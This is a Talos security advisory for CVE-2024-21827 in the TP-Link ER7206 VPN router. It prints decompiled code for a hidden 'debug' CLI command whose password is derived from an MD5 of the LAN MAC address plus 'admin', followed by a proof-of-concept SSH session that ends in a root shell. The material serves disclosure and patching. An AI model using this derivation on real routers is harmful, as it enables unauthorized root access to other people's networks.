CVE-2024-21827
A leftover debug code vulnerability exists in the cli_server debug functionality of Tp-Link ER7206 Omada Gigabit VPN Router 1.4.1 Build 20240117 Rel.57421. A specially crafted series of network requests can lead to arbitrary command execution. An attacker can send a sequence of requests to trigger this vulnerability.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
Tp-Link ER7206 Omada Gigabit VPN Router 1.4.1 Build 20240117 Rel.57421
ER7206 Omada Gigabit VPN Router - https://www.tp-link.com/us/business-networking/vpn-router/er7206/
7.2 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
CWE-489 - Leftover Debug Code
The ER7206 Omada Gigabit VPN Router is a high-performance networking solution that supports gigabit connectivity, highly secure VPN and integration with Omada SDN for centralized cloud management and zero-touch provisioning.
The ER7206 router has a “Remote Assistance” functionality, when enabled it is possible to SSH into the router using the same admin credentials of the web portal.
After the SSH login the user has available a router cli shell:
>help
Commands available:
help Show available commands
exit Exit from current mode
enable Turn on privileged commands
disable Turn off privileged commands
The help command prints the available commands that the user can execute, that are limited in functionalities. There is an hidden command called debug
, following the cli_server
’s cli_debug_command
function that is responsible to handle that command:
undefined8 cli_debug_command(undefined8 terminal_related)
{
[...]
[1] ret = uac_com_get_dev_mac(&LAN_MAC);
[...]
error = 0;
[2] snprintf((char *)&mac_plus_admin,0x17,"%02X:%02X:%02X:%02X:%02X:%02Xadmin",
(ulonglong)LAN_MAC._0_1_,(ulonglong)LAN_MAC._1_1_,(ulonglong)LAN_MAC._2_1_,
(ulonglong)(byte)LAN_MAC,(ulonglong)local_44._0_1_,(ulonglong)(byte)local_44);
mac_plus_admin_len = strlen((char *)&mac_plus_admin);
[3] md5_hexdigest(&mac_plus_admin,mac_plus_admin_len,mac_plus_admin_hex_digest,0x20);
cli_print_no_enter(terminal_related,"Enter your password: ");
[...]
idx = 0;
[...]
while( true ) {
[...]
read_size = read(terminal,terminal_input_one_char,1);
if (read_size < 0) break;
input_char = (ulonglong)terminal_input_one_char[0];
if (read_size == 0) goto check_password;
if (((-1 < input_char) [...]) && input_char != 0)) {
if (input_char == '\r') goto check_password;
if (idx < 0x10) {
terminal_input[idx] = terminal_input_one_char[0];
idx = (longlong)((int)idx + 1);
}
else {
error = -1;
}
}
}
[...]
check_password:
if (error != -1) {
if (error != 0) {
return 0;
}
[4] is_eq = strncmp(mac_plus_admin_hex_digest,terminal_input,0x10);
if (is_eq == 0) {
[5] system_shell_wrap();
return 0;
}
}
[...]
}
This functionality asks for a password, if the password is correct the user is guaranteed a full linux shell.
At [1]
, it is fetched the LAN MAC address of the device, this is then used, at [2]
, to compose the <LAN_MAC>admin
string. At [3]
the MD5 of the composed string is calculated, then at [4]
the first 16 bytes of the MD5 hex-digest is compared with the provided password, if the two are equal then the code at [5]
is reached. At [5]
the system_shell_wrap
function is called, that will guarantee to the user a full linux shell.
The first thing to do is to enable the “Remote Assistance” in the web portal, after that it’s possible to SSH into the router:
ssh -oHostKeyAlgorithms=+ssh-rsa -oKexAlgorithms=diffie-hellman-group14-sha1 POC@192.168.0.1
POC@192.168.0.1's password:
>help
Commands available:
help Show available commands
exit Exit from current mode
enable Turn on privileged commands
disable Turn off privileged commands
The cli console offers a limited number of commands, if the hidden command debug
is provided the cli would ask for a password:
>debug
Enter your password:
BusyBox v1.22.1 (2024-01-16 18:32:23 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
_______ ________ __
| |.-----.-----.-----.| | | |.----.| |_
| - || _ | -__| || | | || _|| _|
|_______|| __|_____|__|__||________||__| |____|
|__| W I R E L E S S F R E E D O M
-----------------------------------------------------
BARRIER BREAKER (Barrier Breaker, unknown)
-----------------------------------------------------
* 1/2 oz Galliano Pour all ingredients into
* 4 oz cold Coffee an irish coffee mug filled
* 1 1/2 oz Dark Rum with crushed ice. Stir.
* 2 tsp. Creme de Cacao
-----------------------------------------------------
root@ER7206:/#
If the password is correct the user would obtain a full linux shell.
The vendor provided a fix at: https://www.tp-link.com/en/support/download/er7206/v1/#Firmware
2024-02-21 - Vendor Disclosure
2024-06-20 - Vendor Patch Release
2024-06-25 - Public Release
Discovered by the Vulnerability Discovery and Research team of Cisco Talos.